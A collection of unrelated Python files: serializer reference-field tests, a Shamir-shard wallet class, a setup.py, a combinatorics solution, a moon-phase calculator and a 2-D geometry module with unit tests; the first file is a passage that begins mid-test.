instance = ReferencedDoc.objects.create(name="foo")
ref = instance.to_dbref()
assert field.to_internal_value(str(instance.id)) == ref
assert field.to_internal_value({'_id': str(instance.id)}) == ref
def test_input_data(self):
field = ComboReferenceField(serializer=ReferencedSerializer)
value = field.to_internal_value({'name': "Foo"})
assert isinstance(value, ReferencedDoc)
assert value.name == "Foo"
assert value.id is None
def test_output(self):
field = ComboReferenceField(serializer=ReferencedSerializer)
instance = ReferencedDoc.objects.create(name="foo")
strid = str(instance.id)
ref = instance.to_dbref()
assert field.to_representation(instance) == strid
assert field.to_representation(ref) == strid
class TestReferenceMapping(TestCase):
maxDiff = 1000
def test_references(self):
class TestSerializer(DocumentSerializer):
class Meta:
model = RefFieldsDoc
# order is broken
expected = dedent("""
TestSerializer():
id = ObjectIdField(read_only=True)
ref_list = ListField(child=ReferenceField(queryset=ReferencedDoc.objects, required=False), required=False)
ref = ReferenceField(queryset=ReferencedDoc.objects, required=False)
dbref = ReferenceField(queryset=ReferencedDoc.objects, required=False)
cached = ReferenceField(queryset=ReferencedDoc.objects, required=False)
generic = GenericReferenceField(required=False)
""")
assert unicode_repr(TestSerializer()) == expected
def test_shallow(self):
class TestSerializer(DocumentSerializer):
class Meta:
model = ReferencingDoc
depth = 0
expected = dedent("""
TestSerializer():
id = ObjectIdField(read_only=True)
ref = ReferenceField(queryset=ReferencedDoc.objects, required=False)
""")
assert unicode_repr(TestSerializer()) == expected
def test_deep(self):
class TestSerializer(DocumentSerializer):
class Meta:
model = ReferencingDoc
depth = 1
expected = dedent("""
TestSerializer():
id = ObjectIdField(read_only=True)
ref = NestedSerializer(read_only=True):
id = ObjectIdField(read_only=True)
name = CharField(required=False)
""")
assert unicode_repr(TestSerializer()) == expected
def test_recursive(self):
class TestSerializer(DocumentSerializer):
class Meta:
model = RecursiveReferencingDoc
depth = 3
expected = dedent("""
TestSerializer():
id = ObjectIdField(read_only=True)
ref = NestedSerializer(read_only=True):
id = ObjectIdField(read_only=True)
ref = NestedSerializer(read_only=True):
id = ObjectIdField(read_only=True)
ref = NestedSerializer(read_only=True):
id = ObjectIdField(read_only=True)
ref = ReferenceField(queryset=RecursiveReferencingDoc.objects, required=False)
""")
assert unicode_repr(TestSerializer()) == expected
def test_custom_field(self):
class CustomReferencing(ReferenceField):
pass
class TestSerializer(DocumentSerializer):
serializer_reference_field = CustomReferencing
class Meta:
model = ReferencingDoc
depth = 0
expected = dedent("""
TestSerializer():
id = ObjectIdField(read_only=True)
ref = CustomReferencing(queryset=ReferencedDoc.objects, required=False)
""")
assert unicode_repr(TestSerializer()) == expected
def test_custom_generic(self):
class CustomReferencing(GenericReferenceField):
pass
class TestSerializer(DocumentSerializer):
serializer_reference_generic = CustomReferencing
class Meta:
model = GenericReferencingDoc
depth = 0
expected = dedent("""
TestSerializer():
id = ObjectIdField(read_only=True)
ref = CustomReferencing(required=False)
""")
assert unicode_repr(TestSerializer()) == expected
def test_custom_nested(self):
class CustomReferencing(Serializer):
foo = IntegerField()
class TestSerializer(DocumentSerializer):
serializer_reference_nested = CustomReferencing
class Meta:
model = ReferencingDoc
depth = 1
expected = dedent("""
TestSerializer():
id = ObjectIdField(read_only=True)
ref = NestedSerializer(read_only=True):
foo = IntegerField()
""")
assert unicode_repr(TestSerializer()) == expected
class DisplayableReferencedModel(Document):
name = fields.StringField()
def __str__(self):
return '%s Color' % (self.name)
class DisplayableReferencingModel(Document):
color = fields.ReferenceField(DisplayableReferencedModel)
class TestRelationalFieldDisplayValue(TestCase):
def setUp(self):
self.objects = [
DisplayableReferencedModel.objects.create(name='Red'),
DisplayableReferencedModel.objects.create(name='Green'),
DisplayableReferencedModel.objects.create(name='Blue')
]
self.ids = list(map(lambda e: str(e.id), self.objects))
def doCleanups(self):
DisplayableReferencedModel.drop_collection()
def test_default_display_value(self):
class TestSerializer(DocumentSerializer):
class Meta:
model = DisplayableReferencingModel
serializer = TestSerializer()
expected = OrderedDict([(self.ids[0], 'Red Color'),
(self.ids[1], 'Green Color'),
(self.ids[2], 'Blue Color')])
assert serializer.fields['color'].choices == expected
def test_custom_display_value(self):
class TestField(ReferenceField):
def display_value(self, instance):
return 'My %s Color' % (instance.name)
class TestSerializer(DocumentSerializer):
color = TestField(queryset=DisplayableReferencedModel.objects.all())
class Meta:
model = DisplayableReferencingModel
serializer = TestSerializer()
expected = OrderedDict([(self.ids[0], 'My Red Color'),
(self.ids[1], 'My Green Color'),
(self.ids[2], 'My Blue Color')])
assert serializer.fields['color'].choices == expected
class TestReferenceIntegration(TestCase):
def setUp(self):
self.target = ReferencedDoc.objects.create(
name='Foo'
)
def doCleanups(self):
ReferencedDoc.drop_collection()
ReferencingDoc.drop_collection()
def test_retrieval(self):
instance = ReferencingDoc.objects.create(ref=self.target)
class TestSerializer(DocumentSerializer):
class Meta:
model = ReferencingDoc
depth = 0
serializer = TestSerializer(instance)
expected = {
'id': str(instance.id),
'ref': str(self.target.id),
}
assert serializer.data == expected
def test_retrieval_deep(self):
instance = ReferencingDoc.objects.create(ref=self.target)
class TestSerializer(DocumentSerializer):
class Meta:
model = ReferencingDoc
depth = 1
serializer = TestSerializer(instance)
expected = {
'id': str(instance.id),
'ref': {'id': str(self.target.id), 'name': "Foo"}
}
assert serializer.data == expected
def test_create(self):
class TestSerializer(DocumentSerializer):
class Meta:
model = ReferencingDoc
new_target = ReferencedDoc.objects.create(name="Bar")
data = {'ref': new_target.id}
serializer = TestSerializer(data=data)
assert serializer.is_valid(), serializer.errors
instance = serializer.save()
assert instance.ref.id == new_target.id
expected = {
'id': str(instance.id),
'ref': str(new_target.id)
}
assert serializer.data == expected
def test_update(self):
instance = ReferencingDoc.objects.create(ref=self.target)
class TestSerializer(DocumentSerializer):
class Meta:
model = ReferencingDoc
new_target = ReferencedDoc.objects.create(
name="Bar"
)
data = {
'ref': new_target.id
}
# Serializer should validate okay.
serializer = TestSerializer(instance, data=data)
assert serializer.is_valid(), serializer.errors
# Creating the instance, relationship attributes should be set.
instance = serializer.save()
assert instance.ref.id == new_target.id
# Representation should be correct.
expected = {
'id': str(instance.id),
'ref': str(new_target.id)
}
assert serializer.data == expected
class TestGenericReferenceIntegration(TestCase):
def setUp(self):
self.target = ReferencedDoc.objects.create(name='Foo')
def doCleanups(self):
ReferencedDoc.drop_collection()
GenericReferencingDoc.drop_collection()
def test_retrieval(self):
instance = GenericReferencingDoc.objects.create(ref=self.target)
class TestSerializer(DocumentSerializer):
class Meta:
model = GenericReferencingDoc
depth = 0
serializer = TestSerializer(instance)
expected = {
'id': str(instance.id),
'ref': {'_cls': 'ReferencedDoc', '_id': str(self.target.id)},
}
assert serializer.data == expected
def test_retrieval_deep(self):
instance = GenericReferencingDoc.objects.create(ref=self.target)
class TestSerializer(DocumentSerializer):
class Meta:
model = GenericReferencingDoc
depth = 1
serializer = TestSerializer(instance)
expected = {
'id': str(instance.id),
'ref': {'_cls': 'ReferencedDoc', '_id': str(self.target.id)},
}
assert serializer.data == expected
def test_create(self):
class TestSerializer(DocumentSerializer):
class Meta:
model = GenericReferencingDoc
new_target = ReferencedDoc.objects.create(
name="Bar"
)
data = {
'ref': {'_cls': 'ReferencedDoc', '_id': new_target.id}
}
serializer = TestSerializer(data=data)
assert serializer.is_valid(), serializer.errors
instance = serializer.save()
assert instance.ref == new_target.to_dbref()
expected = {
'id': str(instance.id),
'ref': {'_cls': 'ReferencedDoc', '_id': str(new_target.id)}
}
assert serializer.data == expected
def test_update(self):
instance = GenericReferencingDoc.objects.create(ref=self.target)
class TestSerializer(DocumentSerializer):
class Meta:
model = GenericReferencingDoc
new_target = OtherReferencedDoc.objects.create(name="Bar")
data = {
'ref': {'_cls': 'OtherReferencedDoc', '_id': new_target.id}
}
# Serializer should validate okay.
serializer = TestSerializer(instance, data=data)
assert serializer.is_valid(), serializer.errors
# Creating the instance, relationship attributes should be set.
instance = serializer.save()
assert instance.ref == new_target.to_dbref()
# Representation should be correct.
expected = {
'id': str(instance.id),
'ref': {'_cls': 'OtherReferencedDoc', '_id': str(new_target.id)}
}
assert serializer.data == expected
class ComboReferencingSerializer(DocumentSerializer):
class Meta:
model = ReferencingDoc
ref = ComboReferenceField(serializer=ReferencedSerializer)
def save_subdocs(self, validated_data):
doc = validated_data['ref']
if isinstance(doc, Document):
doc.save()
def create(self, validated_data):
self.save_subdocs(validated_data)
return super(ComboReferencingSerializer, self).create(validated_data)
def update(self, instance, validated_data):
self.save_subdocs(validated_data)
return super(ComboReferencingSerializer, self).update(instance, validated_data)
class TestComboReferenceIntegration(TestCase):
def setUp(self):
self.target = ReferencedDoc.objects.create(name='Foo')
def doCleanups(self):
ReferencedDoc.drop_collection()
ReferencingDoc.drop_collection()
def test_retrieval(self):
instance = ReferencingDoc.objects.create(ref=self.target)
serializer = ComboReferencingSerializer(instance)
expected = {
'id': str(instance.id),
'ref': str(self.target.id),
}
assert serializer.data == expected
def test_retrieval_deep(self):
instance = ReferencingDoc.objects.create(ref=self.target)
class TestSerializer(DocumentSerializer):
class Meta:
model = ReferencingDoc
depth = 1
ref = ComboReferenceField(serializer=ReferencedSerializer)
serializer = TestSerializer(instance)
expected = {
'id': str(instance.id),
'ref': {'id': str(self.target.id), 'name': "Foo"}
}
assert serializer.data == expected
def test_create_ref(self):
new_target = ReferencedDoc.objects.create(name="Bar")
data = {'ref': new_target.id}
serializer = ComboReferencingSerializer(data=data)
assert serializer.is_valid(), serializer.errors
instance = serializer.save()
assert instance.ref.id == new_target.id
expected = {
'id': str(instance.id),
'ref': str(new_target.id)
}
assert serializer.data == expected
def test_create_data(self):
data = {'ref': {'name': "Bar"}}
serializer = ComboReferencingSerializer(data=data)
assert serializer.is_valid(), serializer.errors
instance = serializer.save()
new_target = ReferencedDoc.objects.get(name="Bar")
assert instance.ref.id == new_target.id
expected = {
'id': str(instance.id),
'ref': str(new_target.id)
}
assert serializer.data == expected
def test_update_ref(self):
instance = ReferencingDoc.objects.create(ref=self.target)
new_target = ReferencedDoc.objects.create(name="Bar")
data = {'ref': new_target.id}
serializer = ComboReferencingSerializer(instance, data=data)
assert serializer.is_valid(), serializer.errors
instance = serializer.save()
assert instance.ref.id == new_target.id
expected = {
'id': str(instance.id),
'ref': str(new_target.id)
}
assert serializer.data == expected
def test_update_data(self):
instance = ReferencingDoc.objects.create(ref=self.target)
data = {'ref': {'name': "Bar"}}
serializer = ComboReferencingSerializer(instance, data=data)
assert serializer.is_valid(), serializer.errors
instance = serializer.save()
new_target = ReferencedDoc.objects.get(name="Bar")
assert instance.ref.id == new_target.id
expected = {
'id': str(instance.id),
'ref': str(new_target.id)
}
assert serializer.data == expected
|
from typing import List, Optional, Tuple
import bson
from hermit import shamir_share
from .interface import ShardWordUserInterface
class Shard(object):
"""Represents a single Shamir shard.
"""
@property
def encrypted_mnemonic(self):
"""
The encrypted mnemonic words representing this shard
"""
return self._encrypted_mnemonic
@encrypted_mnemonic.setter
def encrypted_mnemonic(self, words):
self._encrypted_mnemonic = words
self._share_id = None
@property
def share_id(self):
"""
An integer representing the share family that this shard belongs to.
"""
if self._share_id is None:
self._unpack_share()
return self._share_id
@property
def shard_id(self):
"""
A pair of integers representing the group index and the member index of
this shard
"""
if self._group_id is None:
self._unpack_share()
return (self._group_id, self._member_id)
def __init__(self,
name: str,
encrypted_mnemonic: Optional[str],
                 interface: Optional[ShardWordUserInterface] = None,
) -> None:
"""Creates a WalletWordsShard instance
:param name: the name of the shard
:param encrypted_mnemonic: the encrypted form of the mnemonic words for the share
:param interface (optional): the interface used to communicate
with the user about shard information. If none is given, the
default WalletWordUserInterface is used.
"""
self.name = name
self._encrypted_mnemonic = encrypted_mnemonic
self._share_id = None
self._group_id = None
self._member_id = None
if interface is None:
self.interface = ShardWordUserInterface()
else:
self.interface = interface
def input(self) -> None:
"""Input this shard's data from a SLIP39 phrase"""
words = self.interface.enter_shard_words(self.name)
shamir_share.decode_mnemonic(words)
self.encrypted_mnemonic = words
def words(self) -> List[str]:
"""Returns the (decrypted) SLIP39 phrase for this shard"""
return shamir_share.decrypt_mnemonic(self.encrypted_mnemonic, self._get_password())
def change_password(self):
"""Decrypt and re-encrypt this shard with a new password"""
old_password, new_password = self._get_change_password()
self.encrypted_mnemonic = shamir_share.reencrypt_mnemonic(
self.encrypted_mnemonic, old_password, new_password)
self.encrypted_shard = shamir_share.decode_mnemonic(
self.encrypted_mnemonic)
def from_bytes(self, bytes_data: bytes) -> None:
"""Initialize shard from the given bytes"""
self.encrypted_mnemonic = shamir_share.mnemonic_from_bytes(bytes_data)
self.encrypted_shard = shamir_share.decode_mnemonic(
self.encrypted_mnemonic)
def to_bytes(self) -> bytes:
"""Serialize this shard to bytes"""
return shamir_share.mnemonic_to_bytes(self.encrypted_mnemonic)
def to_qr_bson(self) -> bytes:
"""Serialize this shard as BSON, suitable for a QR code"""
return bson.dumps({self.name: self.to_bytes()})
def _unpack_share(self) -> None:
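        # decode_mnemonic returns an 8-tuple; only the share (family)
        # identifier, group index and member index are kept here. The skipped
        # slots are presumably the SLIP-39 thresholds/counts and share value.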
(self._share_id, _, self._group_id, _, _, self._member_id, _,
_) = shamir_share.decode_mnemonic(self.encrypted_mnemonic)
def to_str(self) -> str:
"""Return a user friendly string describing this shard and its membership in a group"""
(identifier, _, group_index, _, _, member_identifier, _,
_) = shamir_share.decode_mnemonic(self.encrypted_mnemonic)
return "{0} (family:{1} group:{2} member:{3})".format(self.name, identifier, group_index + 1, member_identifier + 1)
def _get_password(self) -> bytes:
"""Prompt the user for this shard's password"""
return self.interface.get_password(self.to_str())
def _get_change_password(self) -> Tuple[bytes, bytes]:
return self.interface.get_change_password(self.to_str())
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="dasm",
version="0.0.1",
author="Drazisil",
author_email="me@drazisil.com",
description="A small example package",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/drazisil/dasm",
package_dir={'': 'src'},
packages=setuptools.find_packages("src"),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
entry_points='''
[console_scripts]
dasm=dasm:_main
''',
)
|
# -*- coding: utf-8 -*-
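# Given a copies of 'a' and b copies of 'b', print the k-th string in
# lexicographic order among all strings using exactly those letters.
# Greedy construction: there are C(a-1+b, a-1) strings starting with 'a';
# if k exceeds that count, the answer starts with 'b' instead.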
def main():
import sys
input = sys.stdin.readline
a, b, k = map(int, input().split())
size = 61
c = [[0 for _ in range(size)] for _ in range(size)]
c[0][0] = 1
# nCrを前計算
for i in range(60):
for j in range(i + 1):
c[i + 1][j] += c[i][j]
c[i + 1][j + 1] += c[i][j]
ans = ""
while a + b > 0:
        x = 0  # number of strings possible once the leading character is fixed to 'a'
if a >= 1:
x = c[a - 1 + b][a - 1]
if k <= x:
ans += "a"
a -= 1
else:
ans += "b"
b -= 1
            k -= x  # skip past all the strings that start with 'a'
print(ans)
if __name__ == "__main__":
main()
|
#start 7 objectSwarmObserverTkBugs.py
import ObserverSwarmTk
observerSwarmTk = ObserverSwarmTk.ObserverSwarmTk()
# create objects
observerSwarmTk.buildObjects()
# create actions
observerSwarmTk.buildActions()
# run
observerSwarmTk.mainloop()
#finishing
observerSwarmTk.destroy()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
'''
moonphase.py - Calculate Lunar Phase
Author: Sean B. Palmer, inamidst.com
Cf. http://en.wikipedia.org/wiki/Lunar_phase#Lunar_phase_calculation
'''
from comun import _
import math
import decimal
import datetime
dec = decimal.Decimal
class Moon(object):
def __init__(self, date):
self.date = date
def position(self):
diff = self.date - datetime.datetime(2001, 1, 1)
days = dec(diff.days) + (dec(diff.seconds) / dec(86400))
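        # 0.03386319269 ~= 1 / 29.53059, the mean synodic month in days; the
        # 0.20439731 offset anchors the cycle to the new moon of 2000-12-25,
        # shortly before the 2001-01-01 epoch used above.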
lunations = dec('0.20439731') + (days * dec('0.03386319269'))
return lunations % dec(1)
def phase(self):
pos = self.position()
index = (pos * dec(8)) + dec('0.5')
index = math.floor(index)
return {
0: _('New Moon'),
1: _('Waxing Crescent'),
2: _('First Quarter'),
3: _('Waxing Gibbous'),
4: _('Full Moon'),
5: _('Waning Gibbous'),
6: _('Last Quarter'),
7: _('Waning Crescent')
}[int(index) & 7]
def phase_int(self):
pos = self.position()
index = (pos * dec(8)) + dec('0.5')
index = math.floor(index)
return int(index) & 7
def icon(self):
pos = self.position()
index = (pos * dec(28)) + dec('0.5')
index = int(math.floor(index))
index = str(index)
if len(index) < 2:
index = '0' + index
return 'mwi-moon' + index + '.png'
def image(self):
pos = self.position()
index = (pos * dec(28)) + dec('0.5')
index = int(math.floor(index))
index = str(index)
if len(index) < 2:
index = '0' + index
return 'mwi-moon' + index + '.svg'
if __name__ == '__main__':
y = 2030
m = 3
days = 31
    for i in range(1, days + 1):
moon = Moon(datetime.datetime(y, m, i))
phasename = moon.phase()
roundedpos = round(float(moon.position()), 3)
        print('day %s -> %s (%s): %s' % (i, phasename,
                                         roundedpos, moon.icon()))
exit(0)
|
# -*- coding: utf-8 -*-
from __future__ import annotations
from dataclasses import dataclass
from typing import Tuple
@dataclass
class Size:
"""A height and width in 2-dimensional space.
Attributes
----------
cx : int
The width component of the Size.
cy : int
The height component of the Size.
    Methods
    -------
    __add__
    __sub__
    """
cx: int = 0
cy: int = 0
def __add__(self, other: Size) -> Size:
"""Return the sum of two sizes."""
return Size(self.cx + other.cx, self.cy + other.cy)
def __sub__(self, other: Size) -> Size:
"""Return the difference of two sizes."""
return Size(self.cx - other.cx, self.cy - other.cy)
@dataclass
class Point:
"""A point in 2-dimensional space."""
x: int = 0
y: int = 0
def offset(self, x_offset: int, y_offset: int):
"""Offset the point by the given values."""
self.x += x_offset
self.y += y_offset
def __sub__(self, rhs):
"""Return the difference of two points."""
return Point(self.x - rhs.x, self.y - rhs.y)
def __add__(self, rhs):
"""Return the sum of two points."""
return Point(self.x + rhs.x, self.y + rhs.y)
def manhattan_distance(self, other) -> int:
"""Calculate the Manhattan distance between `self` and `other`."""
return abs(self.x - other.x) + abs(self.y - other.y)
@dataclass
class Rectangle:
"""A rectangle in 2-dimensional space."""
left: int = 0
top: int = 0
right: int = 0
bottom: int = 0
def bottom_right(self) -> Point:
"""Return the bottom-right point of the rectangle."""
return Point(self.right, self.bottom)
def center_point(self) -> Point:
"""Return the center point of the rectangle."""
return Point(self.left + (self.width() // 2), self.top + (self.height() // 2))
def width(self) -> int:
"""Return the width of the rectangle."""
return self.right - self.left
def height(self) -> int:
"""Return the height of the rectangle."""
return self.bottom - self.top
def deflate(self, cx: int, cy: int) -> None:
"""Deflate the rectangle by moving the sides towards the center."""
self.left += cx
self.top += cy
self.right -= cx
self.bottom -= cy
def deflate_rect(self, rhs) -> None:
"""Deflate the rectangle by moving the sides towards the center."""
self.left += rhs.left
self.top += rhs.top
self.right -= rhs.right
self.bottom -= rhs.bottom
def inflate(self, cx: int, cy: int) -> None:
"""Inflate the rectangle by moving the sides away from the center."""
self.left -= cx
self.top -= cy
self.right += cx
self.bottom += cy
def inflate_rect(self, rhs) -> None:
"""Inflate the rectangle by moving the sides away from the center."""
self.left -= rhs.left
self.top -= rhs.top
self.right += rhs.right
self.bottom += rhs.bottom
def intersect(self, other):
"""Create a rectangle equal to the intersection of the given rectangles."""
return Rectangle(
max(self.left, other.left),
max(self.top, other.top),
min(self.right, other.right),
min(self.bottom, other.bottom),
)
def is_empty(self) -> bool:
"""Return True if the rectangle height and or width are <= 0."""
return self.height() <= 0 or self.width() <= 0
def is_null(self) -> bool:
"""Return True if all values in the rectangle are 0."""
return self.left == 0 and self.top == 0 and self.right == 0 and self.bottom == 0
def move_to_x(self, x: int) -> None:
"""Move the rectangle to the absolute coordinate specified by x."""
self.right = self.width() + x
self.left = x
def move_to_y(self, y: int) -> None:
"""Move the rectangle to the absolute coordinate specified by y."""
self.bottom = self.height() + y
self.top = y
def move_to_xy(self, x: int, y: int) -> None:
"""Move the rectangle to the absolute x- and y- coordinates specified."""
self.move_to_x(x)
self.move_to_y(y)
    def normalize(self) -> None:
        """Normalize the rectangle so that both the height and the width are positive."""
if self.left > self.right:
self.left, self.right = self.right, self.left
if self.top > self.bottom:
self.top, self.bottom = self.bottom, self.top
def offset(self, x_offset: int, y_offset: int) -> None:
"""Offset the point by the given values."""
self.left += x_offset
self.top += y_offset
self.right += x_offset
self.bottom += y_offset
    def __add__(self, rhs):
        """Return a new rectangle displaced by the specified offsets."""
        # Copy first: aliasing self here would mutate the left operand.
        new_rect = Rectangle(self.left, self.top, self.right, self.bottom)
        if isinstance(rhs, Point):
            new_rect.left += rhs.x
            new_rect.top += rhs.y
            new_rect.right += rhs.x
            new_rect.bottom += rhs.y
        elif isinstance(rhs, Rectangle):
            new_rect.left += rhs.left
            new_rect.top += rhs.top
            new_rect.right += rhs.right
            new_rect.bottom += rhs.bottom
        else:
            raise TypeError("rhs must be a Point or a Rect.")
        return new_rect
    def __sub__(self, rhs):
        """Return a new rectangle displaced by the specified offsets."""
        # Copy first: aliasing self here would mutate the left operand.
        new_rect = Rectangle(self.left, self.top, self.right, self.bottom)
        if isinstance(rhs, Point):
            new_rect.left -= rhs.x
            new_rect.top -= rhs.y
            new_rect.right -= rhs.x
            new_rect.bottom -= rhs.y
        elif isinstance(rhs, Rectangle):
            new_rect.left -= rhs.left
            new_rect.top -= rhs.top
            new_rect.right -= rhs.right
            new_rect.bottom -= rhs.bottom
        else:
            raise TypeError("rhs must be a Point or a Rect.")
        return new_rect
def pt_in_rect(self, point: Point) -> bool:
"""Returns True if the given point is inside the rectangle."""
return (
self.left <= point.x
and self.right >= point.x # noqa: W503
and self.top <= point.y # noqa: W503
and self.bottom >= point.y # noqa: W503
)
def set(self, left: int, top: int, right: int, bottom: int) -> None:
"""Set the dimension of the rectangle."""
self.left = left
self.top = top
self.right = right
self.bottom = bottom
def set_empty(self) -> None:
"""Make a null rectangle by setting all coordinates to zero."""
self.left = 0
self.top = 0
self.right = 0
self.bottom = 0
def size(self) -> Size:
"""Get a Size object representing the width and height of the rectangle."""
return Size(self.width(), self.height())
# def subtract_rect(lhs, rhs):
# """Create a rectangle with dimensions equal to the subtraction of lhs from rhs."""
# return Rectangle()
def top_left(self) -> Point:
"""Return the top-left point of the rectangle."""
return Point(self.left, self.top)
def union(self, other):
"""Make a rectangle that is a union of the two given rectangles."""
return Rectangle(
min(self.left, other.left),
min(self.top, other.top),
max(self.right, other.right),
max(self.bottom, other.bottom),
)
def manhattan_distance(a: Tuple[int, int], b: Tuple[int, int]) -> int:
"""Return the Manhattan distance between two points."""
return abs(a[0] - b[0]) + abs(a[1] - b[1])
if __name__ == "__main__":
import unittest
class PointUnitTests(unittest.TestCase):
def test_constructor(self):
default = Point()
self.assertEqual(default.x, 0)
self.assertEqual(default.y, 0)
default = Point(y=25, x=10)
self.assertEqual(default.x, 10)
self.assertEqual(default.y, 25)
def test_offset(self):
x = Point(100, 100)
x.offset(35, 35)
self.assertEqual(x, Point(135, 135))
x = Point(100, 100)
x.offset(-25, -50)
self.assertEqual(x, Point(75, 50))
def test_operator_eq(self):
x = Point(256, 128)
y = Point(256, 128)
self.assertTrue(x == y)
self.assertFalse(x is y)
def test_operator_neq(self):
x = Point(256, 128)
y = Point(1024, 4096)
self.assertTrue(x != y)
def test_operator_add_eq(self):
x = Point(100, 100)
y = Point(35, 35)
x += y
self.assertEqual(x, Point(135, 135))
self.assertEqual(y, Point(35, 35))
def test_operator_sub_eq(self):
x = Point(100, 100)
y = Point(35, 35)
x -= y
self.assertEqual(x, Point(65, 65))
self.assertEqual(y, Point(35, 35))
def test_operator_add(self):
x = Point(100, 100)
y = Point(35, 35)
z = x + y
self.assertEqual(z, Point(135, 135))
self.assertEqual(x, Point(100, 100))
self.assertEqual(y, Point(35, 35))
def test_operator_sub(self):
x = Point(100, 100)
y = Point(35, 35)
z = x - y
self.assertEqual(z, Point(65, 65))
self.assertEqual(x, Point(100, 100))
self.assertEqual(y, Point(35, 35))
class RectangleUnitTests(unittest.TestCase):
def test_constructor(self):
rc = Rectangle()
self.assertEqual(rc.left, 0)
self.assertEqual(rc.top, 0)
self.assertEqual(rc.right, 0)
self.assertEqual(rc.bottom, 0)
rc = Rectangle(top=10, bottom=100, right=128, left=16)
self.assertEqual(rc.left, 16)
self.assertEqual(rc.top, 10)
self.assertEqual(rc.right, 128)
self.assertEqual(rc.bottom, 100)
def test_operator_assign(self):
x = Rectangle(0, 0, 127, 128)
y = x
self.assertEqual(y, Rectangle(0, 0, 127, 128))
def test_operator_eq(self):
x = Rectangle(35, 150, 10, 25)
y = Rectangle(35, 150, 10, 25)
z = Rectangle(98, 999, 6, 3)
self.assertTrue(x == y)
self.assertFalse(x is y)
self.assertFalse(x == z)
def test_operator_not_eq(self):
x = Rectangle(35, 150, 10, 25)
y = Rectangle(35, 150, 10, 25)
z = Rectangle(98, 999, 6, 3)
self.assertFalse(x != y)
self.assertFalse(x is y)
self.assertTrue(x != z)
def test_operator_add(self):
x = Rectangle(100, 235, 200, 335)
y = x + Point(35, 65)
self.assertEqual(y, Rectangle(135, 300, 235, 400))
x = Rectangle(100, 235, 200, 335)
y = x + Rectangle(1, 2, 3, 4)
self.assertEqual(y, Rectangle(101, 237, 203, 339))
def test_operator_add_eq(self):
x = Rectangle(100, 235, 200, 335)
x += Point(35, 65)
self.assertEqual(x, Rectangle(135, 300, 235, 400))
x = Rectangle(100, 235, 200, 335)
x += Rectangle(1, 2, 3, 4)
self.assertEqual(x, Rectangle(101, 237, 203, 339))
def test_operator_sub(self):
x = Rectangle(100, 235, 200, 335)
y = x - Point(35, 65)
self.assertEqual(y, Rectangle(65, 170, 165, 270))
x = Rectangle(100, 235, 200, 335)
y = x - Rectangle(1, 2, 3, 4)
self.assertEqual(y, Rectangle(99, 233, 197, 331))
def test_operator_sub_eq(self):
x = Rectangle(100, 235, 200, 335)
x -= Point(35, 65)
self.assertEqual(x, Rectangle(65, 170, 165, 270))
x = Rectangle(100, 235, 200, 335)
x -= Rectangle(1, 2, 3, 4)
self.assertEqual(x, Rectangle(99, 233, 197, 331))
def test_bottom_right(self):
rc = Rectangle(210, 150, 350, 900)
pt = rc.bottom_right()
self.assertTrue(isinstance(pt, Point))
self.assertEqual(pt, Point(350, 900))
def test_center_point(self):
rc = Rectangle(210, 150, 350, 900)
pt = rc.center_point()
self.assertTrue(isinstance(pt, Point))
self.assertEqual(pt, Point(280, 525))
def test_deflates(self):
rc = Rectangle(10, 10, 50, 50)
rc.deflate(1, 2)
self.assertEqual(rc, Rectangle(11, 12, 49, 48))
rc = Rectangle(10, 10, 50, 50)
rc.deflate_rect(Rectangle(1, 2, 3, 4))
self.assertEqual(rc, Rectangle(11, 12, 47, 46))
def test_height_and_width(self):
rc = Rectangle(20, 30, 80, 70)
self.assertEqual(rc.height(), 40)
self.assertEqual(rc.width(), 60)
def test_inflates(self):
rc = Rectangle(0, 0, 300, 300)
rc.inflate(50, 200)
self.assertEqual(rc, Rectangle(-50, -200, 350, 500))
rc = Rectangle(0, 0, 300, 300)
rc.inflate_rect(Rectangle(50, 60, 300, 310))
self.assertEqual(rc, Rectangle(-50, -60, 600, 610))
def test_intersect(self):
rc = Rectangle(125, 0, 150, 200)
result = rc.intersect(Rectangle(0, 75, 350, 95))
self.assertEqual(result, Rectangle(125, 75, 150, 95))
def test_is_empty(self):
none = Rectangle()
some = Rectangle(35, 50, 135, 150)
null = Rectangle(35, 35, 35, 35)
self.assertTrue(none.is_empty())
self.assertFalse(some.is_empty())
self.assertTrue(null.is_empty())
def test_is_null(self):
none = Rectangle()
some = Rectangle(35, 50, 135, 150)
null = Rectangle(35, 35, 35, 35)
self.assertTrue(none.is_null())
self.assertFalse(some.is_null())
self.assertFalse(null.is_null())
def test_move_to_x(self):
rc = Rectangle(0, 0, 100, 100)
rc.move_to_x(10)
self.assertEqual(rc, Rectangle(10, 0, 110, 100))
def test_move_to_xy(self):
rc = Rectangle(0, 0, 100, 100)
rc.move_to_xy(10, 20)
self.assertEqual(rc, Rectangle(10, 20, 110, 120))
def test_move_to_y(self):
rc = Rectangle(0, 0, 100, 100)
rc.move_to_y(20)
self.assertEqual(rc, Rectangle(0, 20, 100, 120))
def test_normalize(self):
x = Rectangle(110, 100, 250, 310)
x.normalize()
y = Rectangle(250, 310, 110, 100)
y.normalize()
self.assertEqual(x, y)
x = Rectangle(0, 0, 100, 100)
x.normalize()
self.assertEqual(x, Rectangle(0, 0, 100, 100))
def test_offset(self):
x = Rectangle(0, 0, 35, 35)
x.offset(230, 230)
self.assertEqual(x, Rectangle(230, 230, 265, 265))
def test_pt_in_rect(self):
x = Rectangle(5, 5, 100, 100)
self.assertTrue(x.pt_in_rect(Point(35, 50)))
self.assertFalse(x.pt_in_rect(Point(125, 298)))
def test_sets(self):
x = Rectangle()
self.assertEqual(x, Rectangle(0, 0, 0, 0))
x.set(256, 256, 512, 512)
self.assertEqual(x, Rectangle(256, 256, 512, 512))
x.set_empty()
self.assertEqual(x, Rectangle())
def test_size(self):
x = Rectangle(10, 10, 50, 50)
sz = x.size()
self.assertTrue(isinstance(sz, Size))
self.assertEqual(sz, Size(40, 40))
# def test_subtract_rect(self):
# x = Rectangle(10, 10, 100, 100)
# y = Rectangle(50, 10, 150, 150)
# z = x.subtract_rect(y)
# self.assertEqual(x, Rectangle(10, 10, 50, 100))
def test_top_left(self):
x = Rectangle(128, 128, 256, 256)
pt = x.top_left()
self.assertTrue(isinstance(pt, Point))
self.assertEqual(pt, Point(128, 128))
def test_union(self):
x = Rectangle(100, 0, 200, 300)
y = Rectangle(0, 100, 300, 200)
z = x.union(y)
